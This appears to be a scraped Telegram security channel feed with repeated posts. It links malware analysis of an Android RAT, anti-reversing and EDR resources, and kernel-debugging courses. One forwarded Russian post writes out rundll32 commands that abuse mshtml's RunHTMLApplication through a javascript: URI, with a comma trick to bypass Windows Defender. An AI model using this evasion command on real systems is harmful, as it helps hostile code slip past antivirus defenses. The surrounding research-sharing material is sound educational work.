👍8
Reverse engineering of Android Phoenix RAT
Analysis: link
Phoenix overview: link
#malware_analysis
———
@islemolecule_source
Analysis: link
Phoenix overview: link
#malware_analysis
———
@islemolecule_source
Medium
Reverse engineering of Android/Phoenix
Android/Phoenix is a malicious Remote Access Tool. Its main goal is to extensively spy on the victim’s phone (grab all screenshots, steal…
Forwarded from Proxy Bar
Windows Defender Detection Mitigation Bypass Vulnerability
Win LPE
В 2022 году hyp3rlinx рассказывал как можно обойти
*
то есть было и пофиксили:
магия запятой:
собака старая, трюки новые.
CVE пока не имеет )
#defender #bypass
Win LPE
В 2022 году hyp3rlinx рассказывал как можно обойти
windows defender передав дополнительный путь при ссылке на mshtml, дырку пофиксили. НО, добавив пару запятых в старый трюк - и опять bypass. *
то есть было и пофиксили:
C:\sec>rundll32.exe javanoscript:"\..\..\mshtml,RunHTMLApplication ";alert(666)магия запятой:
C:\sec>rundll32.exe javanoscript:"\..\..\mshtml,,RunHTMLApplication ";alert(666)собака старая, трюки новые.
CVE пока не имеет )
#defender #bypass
👍4
👍2
👍2
NullSection - An Anti-Reversing Tool That Applies A Technique That Overwrites The Section Header With Nullbytes
Link
#reverse
———
@islemolecule_source
Link
#reverse
———
@islemolecule_source
👍2
Take a look into the depths of
Windows kernels and
reveal more than 60000
undocumented structures
https://www.vergiliusproject.com/kernels
#windows
———
@islemolecule_source
Windows kernels and
reveal more than 60000
undocumented structures
https://www.vergiliusproject.com/kernels
#windows
———
@islemolecule_source
🔥6
🔥1🙏1
Malware research community repo
https://github.com/Malware-Research/Resources
#malware_analysis
____
@islemolecule_source
https://github.com/Malware-Research/Resources
#malware_analysis
____
@islemolecule_source
GitHub
GitHub - Malware-Research/Resources: Collection of resources that are made by the Malware Research community
Collection of resources that are made by the Malware Research community - Malware-Research/Resources
🔥2
Forwarded from Source Byte (Anastasia 🐞)
[ 1 ] From a Windows driver to a fully functionnal driver.
In this blogpost we'll go through the history of EDR's, how they used to work, how they work now and how we can build a fully functionnal one. Last step is a chall, bypass MyDumbEDR.
https://sensepost.com/blog/2024/sensecon-23-from-windows-drivers-to-an-almost-fully-working-edr/
[ 2 ] internal mecanisms of EDR's :
https://www.youtube.com/watch?v=yacpjV6kWpM&t=387s
[ 3 ] MyDumbEDR ( written in C )
https://github.com/sensepost/mydumbedr
———
@islemolecule_source
In this blogpost we'll go through the history of EDR's, how they used to work, how they work now and how we can build a fully functionnal one. Last step is a chall, bypass MyDumbEDR.
https://sensepost.com/blog/2024/sensecon-23-from-windows-drivers-to-an-almost-fully-working-edr/
[ 2 ] internal mecanisms of EDR's :
https://www.youtube.com/watch?v=yacpjV6kWpM&t=387s
[ 3 ] MyDumbEDR ( written in C )
https://github.com/sensepost/mydumbedr
———
@islemolecule_source
❤5
The comprehensive HyperDbg training course published on YouTube. It is definitely much better to register on OpenSecurityTrainings website and follow the course there because there are a series of labs and additional instructions on their website:
https://ost2.fyi/Dbg3301
Here is the YouTube playlist link:
https://www.youtube.com/watch?v=RDlp0PCFgxI&list=PLUFkSN0XLZ-kF1f143wlw8ujlH2A45nZY
Slides link:
https://gitlab.com/opensecuritytraining/dbg3301_hyperdbg_slides_and_files
If you have any feedback, I will be happy to share it with you. 🙏
(sina ✍)
https://ost2.fyi/Dbg3301
Here is the YouTube playlist link:
https://www.youtube.com/watch?v=RDlp0PCFgxI&list=PLUFkSN0XLZ-kF1f143wlw8ujlH2A45nZY
Slides link:
https://gitlab.com/opensecuritytraining/dbg3301_hyperdbg_slides_and_files
If you have any feedback, I will be happy to share it with you. 🙏
(sina ✍)
❤5